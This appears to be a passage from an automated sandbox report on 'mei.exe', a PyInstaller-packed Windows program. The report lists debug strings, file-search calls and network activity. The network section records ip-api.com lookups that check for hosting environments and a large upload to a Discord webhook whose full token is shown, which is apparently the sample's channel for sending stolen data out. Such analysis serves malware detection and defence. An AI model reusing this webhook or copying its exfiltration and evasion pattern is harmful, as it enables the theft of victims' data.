Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652543301.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: mei.exe, 00000000.00000003.1647535631.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2043271260.00007FFE1A461000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651287443.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651679430.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: mei.exe, 00000001.00000002.2042619049.00007FFE130C1000.00000040.00000001.01000000.0000000E.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652173904.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1648814033.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653415930.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1654133646.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652354604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651177435.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652173904.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: mei.exe, mei.exe, 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: mei.exe, 00000001.00000002.2040881972.00007FFE0E151000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653247212.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: mei.exe, mei.exe, 00000001.00000002.2038251187.00007FFDFB132000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: mei.exe, 00000000.00000003.1647535631.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2043271260.00007FFE1A461000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652750361.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1650835527.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652354604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653329931.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1650338717.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651868024.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: mei.exe, 00000000.00000003.1649158066.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: mei.exe, 00000001.00000002.2041297975.00007FFE101D1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: api-ms-win-core-fibers-l1-1-0.pdb source: mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: mei.exe, 00000000.00000003.1649338725.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653415930.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652750361.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1648931758.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: mei.exe, 00000001.00000002.2042063741.00007FFE11EA1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1649158066.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: mei.exe, 00000001.00000002.2040733721.00007FFE007D4000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: mei.exe, 00000001.00000002.2041795080.00007FFE10301000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: mei.exe, 00000001.00000002.2037809311.00007FFDFAD80000.00000040.00000001.01000000.00000014.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652071686.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: mei.exe, 00000000.00000003.1649574507.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: mei.exe, 00000000.00000003.1648931758.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: mei.exe, mei.exe, 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: mei.exe, 00000000.00000003.1653329931.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651177435.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: mei.exe, 00000001.00000002.2039190548.00007FFDFB63B000.00000040.00000001.01000000.00000005.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653247212.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: mei.exe, 00000000.00000003.1654133646.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652658950.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: mei.exe, 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: mei.exe, 00000001.00000002.2041525721.00007FFE1025C000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: mei.exe, 00000000.00000003.1651287443.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: mei.exe, 00000001.00000002.2042441121.00007FFE12E11000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1651679430.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1653504776.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: mei.exe, 00000001.00000002.2041096731.00007FFE0EB41000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\mei.exe Code function: 0_2_00007FF6313E7CFC _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF6313E7CFC
              Source: C:\Users\user\Desktop\mei.exe Code function: 0_2_00007FF6313F1D94 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6313F1D94
              Source: C:\Users\user\Desktop\mei.exe Code function: 0_2_00007FF6313D8880 FindFirstFileExW,FindClose,0_2_00007FF6313D8880
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe Code function: 89_2_00007FF7D79E46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,89_2_00007FF7D79E46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe Code function: 89_2_00007FF7D7A288E0 FindFirstFileExA,89_2_00007FF7D7A288E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe Code function: 89_2_00007FF7D79DE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,89_2_00007FF7D79DE21C

              Networking

              Source: powershell.exe, 00000009.00000002.1727946923.000001BABE308000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
              Source: powershell.exe, 00000009.00000002.1727946923.000001BABE308000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
              Source: powershell.exe, 00000009.00000002.1727946923.000001BABE308000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryx
              Source: unknown DNS query: name: ip-api.com
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.1.0
              Source: global traffic HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.1.0
              Source: mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: unknown DNS traffic detected: queries for: blank-kwj1y.in
              Source: unknown HTTP traffic detected: POST /api/webhooks/1180990550996959354/etoFF7oxewDUkUSy5k9Nl0yqXw0esYNFZVGnAZjRg16T1HayU_0isZXCxwisPvLSjXVC HTTP/1.1 Host: discord.com Accept-Encoding: identity Content-Length: 696433 User-Agent: python-urllib3/2.1.0 Content-Type: multipart/form-data; boundary=e3d1360ad0622e034bb000d4c8b44246
              Source: mei.exe, 00000000.00000003.1655454167.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: mei.exe, 00000000.00000003.1655058953.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
              Source: mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1656980860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655454167.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647965760.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648120175.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655571930.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648204422.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655058953.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648569256.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1656980860.000001FFF1DE2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648688899.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657827299.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653004204.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1656980860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655454167.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647965760.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648120175.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655571930.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648204422.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655058953.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648569256.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648688899.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657827299.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648446190.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657110150.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1655847395.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647712678.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648318612.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1647838508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: mei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E91404C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025311292.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025311292.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1780553152.000002E91404B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819432737.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033294931.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1752594754.000002E914108000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E91404B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033404601.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E913FBD000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033077416.000002E913FBD000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027009645.000002E914108000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1752721224.000001BAD6540000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1895388428.000001E1C95F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652445454.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651444604.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1657526057.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649061865.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 